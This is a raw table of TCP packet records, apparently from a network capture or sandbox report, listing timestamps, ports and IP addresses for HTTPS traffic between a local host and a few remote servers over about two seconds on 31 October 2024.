                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.522144079 CET49722443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.522152901 CET4434972213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.535458088 CET4434972313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.536046028 CET49723443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.536065102 CET4434972313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.536657095 CET49723443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.536663055 CET4434972313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.540375948 CET49727443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.540415049 CET44349727206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.540482044 CET49727443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.541476011 CET49728443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.541500092 CET44349728206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.541544914 CET49728443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.541752100 CET49727443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.541766882 CET44349727206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.542002916 CET49728443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.542010069 CET44349728206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.587373972 CET4434972513.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.588201046 CET49725443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.588227034 CET4434972513.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.588937998 CET49725443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.588944912 CET4434972513.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.589375973 CET4434972413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.590008020 CET49724443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.590030909 CET4434972413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.590533018 CET49724443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.590538979 CET4434972413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.593509912 CET4434972613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.593871117 CET49726443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.593883038 CET4434972613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.594294071 CET49726443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.594300985 CET4434972613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.647790909 CET4434972213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.647927046 CET4434972213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.647998095 CET49722443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.648124933 CET49722443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.648144960 CET4434972213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.648156881 CET49722443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.648163080 CET4434972213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.651144981 CET49729443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.651184082 CET4434972913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.651268005 CET49729443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.651410103 CET49729443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.651422977 CET4434972913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.666771889 CET4434972313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.666955948 CET4434972313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.667020082 CET49723443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.667067051 CET49723443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.667085886 CET4434972313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.667099953 CET49723443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.667109966 CET4434972313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.669816017 CET49730443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.669846058 CET4434973013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.669953108 CET49730443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.670073986 CET49730443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.670094967 CET4434973013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.718378067 CET4434972513.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.718434095 CET4434972513.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.718627930 CET49725443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.718676090 CET49725443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.718677044 CET49725443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.718694925 CET4434972513.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.718705893 CET4434972513.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.721349955 CET49731443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.721384048 CET4434973113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.721528053 CET49731443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.721704006 CET49731443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.721714973 CET4434973113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.742073059 CET4434972613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.742134094 CET4434972613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.742221117 CET49726443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.742382050 CET49726443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.742382050 CET49726443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.742394924 CET4434972613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.742403984 CET4434972613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.743715048 CET4434972413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.743777037 CET4434972413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.743849993 CET49724443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.743972063 CET49724443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.743978024 CET4434972413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.743989944 CET49724443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.743994951 CET4434972413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.745050907 CET49732443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.745090008 CET4434973213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.745933056 CET49733443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.745973110 CET4434973313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.745984077 CET49732443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.746057034 CET49733443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.746153116 CET49733443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.746165037 CET4434973313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.746165991 CET49732443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.746182919 CET4434973213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.386408091 CET4434972913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.387952089 CET49729443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.388000965 CET4434972913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.388758898 CET49729443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.388765097 CET4434972913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.398475885 CET44349727206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.400089025 CET49727443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.400120020 CET44349727206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.401252031 CET44349727206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.401334047 CET49727443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.402764082 CET49727443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.402867079 CET44349727206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.403090000 CET49727443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.403095961 CET44349727206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.410604000 CET4434973013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.412827015 CET49730443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.412847042 CET4434973013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.417483091 CET44349728206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.417485952 CET49730443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.417500019 CET4434973013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.418165922 CET49728443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.418185949 CET44349728206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.419265985 CET44349728206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.419351101 CET49728443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.419888020 CET49728443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.419954062 CET44349728206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.458307981 CET49727443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.460597992 CET49728443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.460608006 CET44349728206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.464086056 CET4434973113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.465724945 CET4434973313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.466418982 CET49731443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.466449976 CET4434973113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.467008114 CET49731443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.467015028 CET4434973113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.467444897 CET49733443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.467473984 CET4434973313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.468048096 CET49733443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.468055010 CET4434973313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.475047112 CET4434973213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.476094007 CET49732443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.476125002 CET4434973213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.477473974 CET49732443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.477482080 CET4434973213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.508779049 CET49728443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.515862942 CET4434972913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.516119003 CET4434972913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.516181946 CET49729443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.516518116 CET49729443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.516540051 CET4434972913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.516552925 CET49729443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.516558886 CET4434972913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.520992994 CET49736443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.521040916 CET4434973613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.521111012 CET49736443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.546331882 CET49736443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.546350956 CET4434973613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.547771931 CET4434973013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.547833920 CET4434973013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.547899961 CET49730443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.548410892 CET49730443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.548427105 CET4434973013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.548439026 CET49730443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.548444986 CET4434973013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.562505007 CET49737443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.562542915 CET4434973713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.562679052 CET49737443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.562911987 CET49737443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.562923908 CET4434973713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.593137026 CET4434973313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.593206882 CET4434973313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.593369961 CET49733443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.593417883 CET49733443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.593430042 CET4434973313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.593445063 CET49733443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.593450069 CET4434973313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.603760004 CET49738443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.603789091 CET4434973813.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.603857994 CET49738443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.604504108 CET4434973113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.604573965 CET4434973113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.604625940 CET49731443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.604749918 CET49738443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.604759932 CET4434973813.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.605160952 CET49731443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.605174065 CET4434973113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.605187893 CET49731443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.605192900 CET4434973113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.608555079 CET4434973213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.608669996 CET4434973213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.608732939 CET49732443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.609040022 CET49732443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.609059095 CET4434973213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.609071016 CET49732443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.609076023 CET4434973213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.614219904 CET49739443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.614253998 CET4434973913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.614312887 CET49739443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.614593983 CET49739443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.614607096 CET4434973913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.619415045 CET49740443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.619448900 CET4434974013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.619524956 CET49740443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.620147943 CET49740443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.620165110 CET4434974013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.817379951 CET4434970423.206.229.209192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.817470074 CET49704443192.168.2.923.206.229.209
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.845686913 CET44349727206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.845711946 CET44349727206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.845729113 CET44349727206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.845743895 CET44349727206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.845763922 CET49727443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.845766068 CET44349727206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.845787048 CET44349727206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.845797062 CET44349727206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.845808029 CET49727443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.845814943 CET44349727206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.845824957 CET49727443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.845849991 CET49727443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.845854998 CET44349727206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.845891953 CET49727443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.847578049 CET44349727206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.847598076 CET44349727206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.847637892 CET49727443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.847644091 CET44349727206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.847680092 CET49727443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.847692013 CET49727443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.961457968 CET44349727206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.961486101 CET44349727206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.961529016 CET49727443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.961543083 CET44349727206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.961579084 CET49727443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.961599112 CET49727443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.962944984 CET44349727206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.962961912 CET44349727206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.963041067 CET49727443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.963047028 CET44349727206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.963088036 CET49727443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.964238882 CET44349727206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.964253902 CET44349727206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.964307070 CET49727443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.964313984 CET44349727206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.964339018 CET49727443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:53.964353085 CET49727443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:54.003158092 CET44349727206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:54.003186941 CET44349727206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:54.003297091 CET49727443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:54.003309011 CET44349727206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:54.003348112 CET49727443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:54.077295065 CET44349727206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:54.077317953 CET44349727206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:54.077435017 CET49727443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:54.077466965 CET44349727206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:54.077512026 CET49727443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:54.078427076 CET44349727206.47.98.207192.168.2.9
